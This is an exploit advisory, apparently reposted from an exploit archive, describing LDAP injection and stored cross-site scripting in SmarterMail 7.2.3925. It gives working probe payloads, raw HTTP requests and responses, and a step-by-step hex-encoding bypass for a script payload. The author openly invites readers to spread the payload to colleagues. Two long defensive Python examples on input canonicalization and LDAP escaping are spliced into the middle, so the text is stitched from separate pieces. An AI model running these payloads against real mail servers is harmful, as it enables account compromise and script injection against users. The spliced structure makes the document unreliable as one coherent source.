"SmarterMail < 7.2.3925 - LDAP Injection"

Author: sqlhacker
Platform: asp
Release date: 2010-10-02

########################################################################
# Vendor: smartertools.com SmarterMail 7.x (7.2.3925)
# Date: 2010-10-01
# Author : David Hoyt (sqlhacker) – Hoyt LLC
# Contact : h02332@gmail.com
# Home : http://cloudscan.me
# Dork : insite: SmarterMail Enterprise 7.2
# Bug : LDAP Injection + Cross Site Scripting (STORED)
# Tested on : SmarterMail 7.x (7.2.3925) // Windows 2008 /64/R2
# Uncoordinated Disclosure
########################################################################

ABSTRACT
--------------------------
It is important for application developers to penetration test
their products prior to release in order to find potential vulnerabilities
and correct them before fraudsters exploit them.

DISCLOSURE PURPOSE
--------------------------
Applications for wide-scale deployment must be delivered with an exploit
surface that is manageable.

Developers failing to properly screen applications prior to release are at
risk of uncoordinated disclosure.

SECURITY COMMENTS
--------------------------
Server Application developers should explicitly be detailing the exploit
surface modeling performed on an application as part of the software
development lifecycle, prior to and as part of a candidate release.

System Admins need to take a trust-no-one approach when installing Server
and Client Applications for wide-scale deployment.

ENGAGEMENT TOOLS
--------------------------
I am using Immunity Debugger, Burp Suite Pro 1.3.08, Netsparker, Metasploit,
NeXpose, XSS_Rays, FuzzDB as a baseline set of engagement tools that are being
used to perform this analysis.

This is manual testing.

DISCUSSION AND ANALYSIS
--------------------------
SmarterMail 7.x (7.2.3925) was released on 10/1/2010 and was to have
addressed a number of issues identified in the CVEs
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-3425
and
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3486

There were a number of Private Advisories provided to Hoyt LLC Clients that
were not disclosed to the public. It was our assumption that
the level of detail and specificity would have resulted in a thorough
scrubbing of any patches and release candidates.

There are additional exploits to disclose that use a manual, multi-step
process to confirm with picture proof.

This advisory addresses LDAP Injection, Cross Site Scripting (STORED) and OS
Injection vulnerabilities found in SmarterMail 7.x (7.2.3925).
Additional advisories will be released as we develop a bullet proof audit
trail.

Further advisories will focus on security by obscurity in SmarterMail.

My prior work focused on the URL/Parameter Combos that would deliver a Cross
Site Scripting (STORED) exploit.

My review seeks to focus on the identified URL/Param combos in SmarterMail
7.1 that were found to be vulnerable but not disclosed to the public
and only available in private advisories to our clients and partners.


AUDIT TRAIL + EXPLOIT PATTERN EXAMPLES
--------------------------


EXPLOIT #1
--------------------------
LDAP injection and resulting STORED Cross Site Scripting in Events Planner -
SmarterMail 7.x (7.2.3925)

Summary
Severity:   High
Confidence:   Certain
Host:   http://vulnerable.smartermail.site:9998
Path:   /Main/frmEmptyPreviewOuter.aspx
        Multiple Related URL/Parameters (available in private advisory)

Issue detail
The type parameter is vulnerable to LDAP injection attacks.

The payloads 5faa0382d747b754)(sn=* and 5faa0382d747b754)!(sn=* were each
submitted in the type parameter. These two requests resulted in different
responses, indicating that the input may be being incorporated into a
disjunctive LDAP query in an unsafe manner.

Issue Background
-----------------------
LDAP injection arises when user-controllable data is copied in an unsafe way
into an LDAP query that is performed by the application. If an attacker can
inject LDAP metacharacters into the query, then they can interfere with the
query's logic. Depending on the function for which the query is used, the
attacker may be able to retrieve sensitive data to which they are not
authorised, or subvert the application's logic to perform some unauthorised
action.

Note that automated difference-based tests for LDAP injection flaws can
often be unreliable and are prone to false positive results.

The author has manually reviewed the reported requests and responses and
confirmed a vulnerability is present.

All the work presented is manual recon and analysis using the tools listed.


Step by Step Process
---------------------------------------------------

The steps to create the exploit are as follows:

- Obtain an end-user SmarterMail 7.x (7.2.3925)
- Login to WebMail, click Events

Note - The XSS attack payload can be delivered by creating an Event Group or
an Event Name.

My example will create a new event. I know that SmarterMail does some data
sanitization, so I need to test various encoding schemes to get around the
limited sanity checking.

To make this easy to follow along, use URL http://ha.ckers.org/xss.html for
our encoding calculator so the average Joe can leverage this exploit
example.

I want to make a simple test to confirm if the URL/Parameters are vulnerable
in the Event Planner of SmarterMail 7.x (7.2.3925).
I'll use a known malicious payload example. Using the encoding calculator, I
input <\\\/script>alert(0x000170)<\\/script>
and choose the HEX Value encoding for the Stored Cross Site Scripting exploit
I want to create.

The result is
%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%30%78%30%30%30%31%37%30%29%3C%2F%73%63%72%69%70%74%3E.
There is your example exploit for Stored XSS.

Take the result and paste it into the new event name (exploit) you want to
create and e-mail around to all your colleagues and friends and blog about...

Click submit and refresh the screen. Here is what I "received" for a
payload. I provide 2 examples of URL/Parameter manipulation that result in
an event being created.

** Author Note.. the Blogger parser isn't very good about making me escape
the nasty XSS below.. so I have to edit the post so readers don't get
XSS'd.. Pictures are a part of the exploit surface model, I also like to
post conclusive, picture proof of an exploit.

The picture(s) below provide conclusive evidence of Cross Site Scripting
(STORED) delivered via LDAP Injection.

[Picture #1] Stored Cross Site Scripting Audit Trail for SmarterMail 7.x
(7.2.3925): LDAP Injection to leverage an XSS attack utilizing the event
planner features of SmarterMail 7.x (7.2.3925)

[Picture #2] Stored Cross Site Scripting Audit Trail for SmarterMail 7.x
(7.2.3925): LDAP Injection to leverage an XSS attack utilizing the event
planner features of SmarterMail 7.x (7.2.3925)

The implication here is that SmarterMail isn't defending against HEX Value
malicious payloads. This is a "critical" exploit finding confirmed in
SmarterMail 7.x (7.2.3925).
You can keep testing with Decimal or Base 64 and produce results equal to
and likely greater than what I am showing here in public, emphasis on
greater than what I am showing.
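The finding above is that a hex (percent-encoded) form of the payload gets past SmarterMail's sanity checking. The following added example (not code from the advisory or from SmarterTools) shows the defender's side of that: a check that only inspects the raw submitted value passes the encoded string, a check that canonicalizes (percent-decodes to a fixed point) first catches it, and output encoding neutralizes whatever reaches storage regardless. It goes slightly beyond the page by also covering double encoding. The storage and rendering functions are hypothetical; the encoded payload is the one quoted in the advisory.

```python
import html
from urllib.parse import unquote

# The hex-encoded payload quoted in the advisory, as submitted in an event name.
ENCODED_NAME = ("%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%30%78%30%30"
                "%30%31%37%30%29%3C%2F%73%63%72%69%70%74%3E")


def naive_check(raw: str) -> bool:
    """The weak check the finding points at: it inspects the submitted bytes
    only, so an encoded payload passes because '<script' is not in them."""
    return "<script" not in raw.lower()


def canonicalize(value: str, max_rounds: int = 5) -> str:
    """Percent-decode until the value stops changing, so single or double
    encoding cannot hide markup from the check.  A value that is still
    changing after max_rounds is rejected rather than guessed at."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    raise ValueError("value did not reach a decoding fixed point")


def strict_check(raw: str) -> bool:
    """Canonicalize first, then apply the same check to the real content."""
    return naive_check(canonicalize(raw))


def store_event_name(raw: str) -> str:
    """Hypothetical storage step: keep only values that pass the strict check,
    and store the canonical form so later checks see the same bytes."""
    if not strict_check(raw):
        raise ValueError("event name rejected")
    return canonicalize(raw)


def render_event_name(stored: str) -> str:
    """Output encoding: whatever reached storage is emitted as text, never as
    markup, so a stored payload cannot execute even if input checks slipped."""
    return "<td>" + html.escape(stored, quote=True) + "</td>"


if __name__ == "__main__":
    print("naive check passes encoded payload:", naive_check(ENCODED_NAME))
    print("decoded:", canonicalize(ENCODED_NAME))
    print("strict check passes:", strict_check(ENCODED_NAME))
    print(render_event_name(canonicalize(ENCODED_NAME)))
```

The substring blocklist in `naive_check` is kept only to show the bypass; the control that actually closes a stored XSS is `render_event_name`, which encodes on output for every value, and canonicalization is what makes any input-side check meaningful at all.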


Issue Remediation
-------------------
If possible, applications should avoid copying user-controllable data into
LDAP queries. If this is unavoidable, then the data should be strictly
validated to prevent LDAP injection attacks. In most situations, it will be
appropriate to allow only short alphanumeric strings to be copied into
queries, and any other input should be rejected. At a minimum, input
containing any LDAP metacharacters should be rejected; characters that
should be blocked include ( ) ; , * | & = and whitespace.
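To make the Issue detail, Issue Background and Issue Remediation sections concrete, here is an added example (not code from the advisory or from SmarterTools) of an LDAP filter built the unsafe way beside the two defensive paths the remediation text describes: an allowlist of short alphanumeric values, and RFC 4515 escaping for the cases where an arbitrary string genuinely has to be searched for. The filter template `(&(objectClass=person)(type=...))` is an assumption for illustration; the advisory does not show SmarterMail's real query. The probe value is the one quoted in the Issue detail.

```python
import re

# Metacharacters the remediation text says to reject outright, plus whitespace.
REJECTED_CHARS = set("();,*|&=") | set(" \t\r\n")

# Allowlist for an identifier-style value such as ``type``: short and alphanumeric.
ALLOWED_IDENTIFIER = re.compile(r"^[A-Za-z0-9]{1,32}$")

# Assumed filter shape for illustration; the advisory does not show the real one.
FILTER_TEMPLATE = "(&(objectClass=person)(type={value}))"


def build_filter_unsafe(value: str) -> str:
    """Vulnerable pattern: user input is dropped into the filter verbatim,
    so a value containing ')(' adds clauses the developer never wrote."""
    return FILTER_TEMPLATE.format(value=value)


def contains_metacharacters(value: str) -> bool:
    """True if the value holds any character from the reject list."""
    return any(ch in REJECTED_CHARS for ch in value)


def validate_identifier(value: str) -> bool:
    """Allowlist check from the remediation text: short alphanumeric only."""
    return ALLOWED_IDENTIFIER.fullmatch(value) is not None


def escape_filter_value(value: str) -> str:
    """RFC 4515 escaping for when an arbitrary string legitimately has to be
    matched: backslash, '*', '(', ')' and NUL become a backslash plus two hex
    digits, so the value can never alter the filter's structure."""
    return "".join(
        "\\%02x" % ord(ch) if ch in "\\*()\x00" else ch for ch in value
    )


def build_filter_safe(value: str) -> str:
    """Hardened path: reject anything outside the allowlist, then escape as
    defence in depth before inserting the value."""
    if not validate_identifier(value):
        raise ValueError("type must be a short alphanumeric string")
    return FILTER_TEMPLATE.format(value=escape_filter_value(value))


def top_level_clauses(ldap_filter: str) -> list:
    """Split the children of an outer '(&...)' filter so the effect of an
    injected ')(' on the query's structure can be seen directly."""
    inner = ldap_filter[2:-1]  # strip leading '(&' and trailing ')'
    clauses, depth, start = [], 0, 0
    for i, ch in enumerate(inner):
        if ch == "(":
            if depth == 0:
                start = i
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth == 0:
                clauses.append(inner[start:i + 1])
    return clauses


if __name__ == "__main__":
    probe = "5faa0382d747b754)(sn=*"  # probe value quoted in the advisory
    unsafe = build_filter_unsafe(probe)
    print(unsafe, "->", len(top_level_clauses(unsafe)), "clauses")
    print(FILTER_TEMPLATE.format(value=escape_filter_value(probe)), "-> 2 clauses")
    print("allowlist accepts probe:", validate_identifier(probe))
```

With the unsafe builder the probe turns a two-clause query into a three-clause one, which is exactly the structural change the differing responses in the Issue detail point at; with escaping the same bytes are matched literally and the clause count stays at two, and with the allowlist the value never reaches the query at all.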


EXPLOIT Proof of Concept {PoC} - DETAILS
--------------------------------------------

Request 1
GET /Main/frmEmptyPreviewOuter.aspx?type=5faa0382d747b754)(sn=* HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg,
application/x-ms-application, application/x-ms-xbap,
application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://vulnerable.smartermail.site:9998/Default.aspx
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64;
Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.smartermail.site:9998
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; SelectedLanguage=;
settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default;
STTTState=;
STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserContacts"}



Response 1
HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:28:00 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 5204


...[SNIP]...
<![CDATA[
UpdateSidebarCounts('UserSync', 0);
$(function() { if (parent.UpdateCurrentPage)
parent.UpdateCurrentPage('\x2fMain\x2ffrmEmptyPreviewOuter\x2easpx?type\x3d5faa0382d747b754\x29\x28sn\x253d\x2a');
});
Sys.Application.initialize();
$(function() {
SetTopTitle('No\x20item\x20has\x20been\x20selected\x20\x2d\x20hoytllc\x2ecom\x20\x2d\x20SmarterMail');
});
//]]>
</script>
</form>
</body>
</html>



Request 2
GET /Main/frmEmptyPreviewOuter.aspx?type=5faa0382d747b754)!(sn=* HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg,
application/x-ms-application, application/x-ms-xbap,
application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://vulnerable.smartermail.site:9998/Default.aspx
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64;
Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.smartermail.site:9998
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; SelectedLanguage=;
settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default;
STTTState=;
STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserContacts"}



Response 2
HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:28:00 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 5247


...[SNIP]...
<![CDATA[
UpdateSidebarCounts('UserEmail', 0);
UpdateSidebarCounts('UserSync', 0);
$(function() { if (parent.UpdateCurrentPage)
parent.UpdateCurrentPage('\x2fMain\x2ffrmEmptyPreviewOuter\x2easpx?type\x3d5faa0382d747b754\x29\x21\x28sn\x253d\x2a');
});
Sys.Application.initialize();
$(function() {
SetTopTitle('No\x20item\x20has\x20been\x20selected\x20\x2d\x20hoytllc\x2ecom\x20\x2d\x20SmarterMail');
});
//]]>



EXPLOIT #2
--------------------------
Directory Creation by Fuzzing that results in a STORED Cross Site Scripting
attack.

This portion of the research focused on creating directories that would evade
the current filtering techniques used by SmarterMail to prevent OS Injection.



WORKAROUNDS
--------------------------
Specifically, URL filtering should be employed against the malicious query
strings.



REMEDIATION SOLUTION
------------------------

I'm pushing a quick update to my clients now on this LDAP Injection / Stored
XSS issue..
Our group is studying a remediation solution or additional workarounds that
will be posted at this URL.

Calendar and Event functionality is not straightforward to implement
securely.
Some recommendations to consider in the design of this functionality
include:

Validating Input and a blacklist of strings to hinder this style of attack.

There is more to the story.. since I'm just screening applications for
clients, I am pushing out the info as I confirm it manually.